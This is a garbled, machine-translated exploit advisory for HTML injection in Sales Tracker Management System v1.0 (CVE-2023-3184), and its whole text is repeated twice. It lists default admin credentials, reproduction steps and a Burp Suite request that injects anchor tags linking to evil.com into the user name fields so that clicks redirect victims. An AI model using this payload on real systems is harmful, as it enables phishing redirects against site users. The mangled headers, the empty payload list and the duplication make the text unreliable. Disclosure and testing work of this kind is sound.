利用标题:销售跟踪器管理系统v1.0 - 多个漏洞
Google Dork: NA
日期: 09-06-2023
exploit-author: affan ahmed
供应商homepage: https://www.sourcecodester.com/
软件link: https://ww.sourcecodester.com/downl...em+System+using+php+fefree+source+source+code
版本: 1.0
在: Windows 11 + XAMPP上测试
CVE : CVE-2023-3184
======================================
使用凭证
======================================
行政学会
用户名:管理员
密码: Admin123
=======================================
payload_used
=======================================
1
2
3
4
========================================
步骤_to_reproduce
========================================
1。首先使用管理员的给定凭证登录到您的帐户
2。然后在“创建新按钮或访问此url3:
3。然后填写详细信息,然后将上述有效载荷放入`
4。输入有效载荷后,单击“保存”按钮
5。保存表格后,您将被重定向到管理站点,在那里您可以看到添加了新用户。
6。单击每个有效负载后,它将我重定向到邪恶的网站
====================================================
burpsuite_request
====================================================
post/php-sts/classes/users.php?f=save http/1.1
HOST: LOCALHOST
内容长度: 1037
SEC-CH-UA:
ACCEPT: /
content-type:多部分/form-data;边界=--- WebKitformBoundary7HWJNQW3MPTDFOWO
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=r0ejggs25qnlkf9funj44b1pbn
连接:关闭
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='id'
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='firstName'
a href=//evil.comclick_here_for_firstname/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data; name='middlename'
a href=//evil.comClick_here_for_middlename/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='lastname'
a href=//evil.comclick_here_for_lastname/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='用户名'
a href=//evil.comclick_here_for_username/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='密码'
1234
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='类型'
2
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundary7hwjnqw3mptdfowo--
========================================
procip_of_concept
========================================
github_link: https://github.com/ctflearner/vulnerabily/blob/main/sales_tracker_tracker_management_system/stms.md
Google Dork: NA
日期: 09-06-2023
exploit-author: affan ahmed
供应商homepage: https://www.sourcecodester.com/
软件link: https://ww.sourcecodester.com/downl...em+System+using+php+fefree+source+source+code
版本: 1.0
在: Windows 11 + XAMPP上测试
CVE : CVE-2023-3184
======================================
使用凭证
======================================
行政学会
用户名:管理员
密码: Admin123
=======================================
payload_used
=======================================
1
2
3
4
========================================
步骤_to_reproduce
========================================
1。首先使用管理员的给定凭证登录到您的帐户
2。然后在“创建新按钮或访问此url3:
3http://localhost/php-sts/admin/?page=user/manage_user”上访问user_list和clcik3。然后填写详细信息,然后将上述有效载荷放入`
firstnamemiddlename`lastname'''''''''4。输入有效载荷后,单击“保存”按钮
5。保存表格后,您将被重定向到管理站点,在那里您可以看到添加了新用户。
6。单击每个有效负载后,它将我重定向到邪恶的网站
====================================================
burpsuite_request
====================================================
post/php-sts/classes/users.php?f=save http/1.1
HOST: LOCALHOST
内容长度: 1037
SEC-CH-UA:
ACCEPT: /
content-type:多部分/form-data;边界=--- WebKitformBoundary7HWJNQW3MPTDFOWO
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=r0ejggs25qnlkf9funj44b1pbn
连接:关闭
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='id'
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='firstName'
a href=//evil.comclick_here_for_firstname/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data; name='middlename'
a href=//evil.comClick_here_for_middlename/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='lastname'
a href=//evil.comclick_here_for_lastname/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='用户名'
a href=//evil.comclick_here_for_username/a
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='密码'
1234
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='类型'
2
------ webkitformboundary7HWJNQW3MptdFowo
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundary7hwjnqw3mptdfowo--
========================================
procip_of_concept
========================================
github_link: https://github.com/ctflearner/vulnerabily/blob/main/sales_tracker_tracker_management_system/stms.md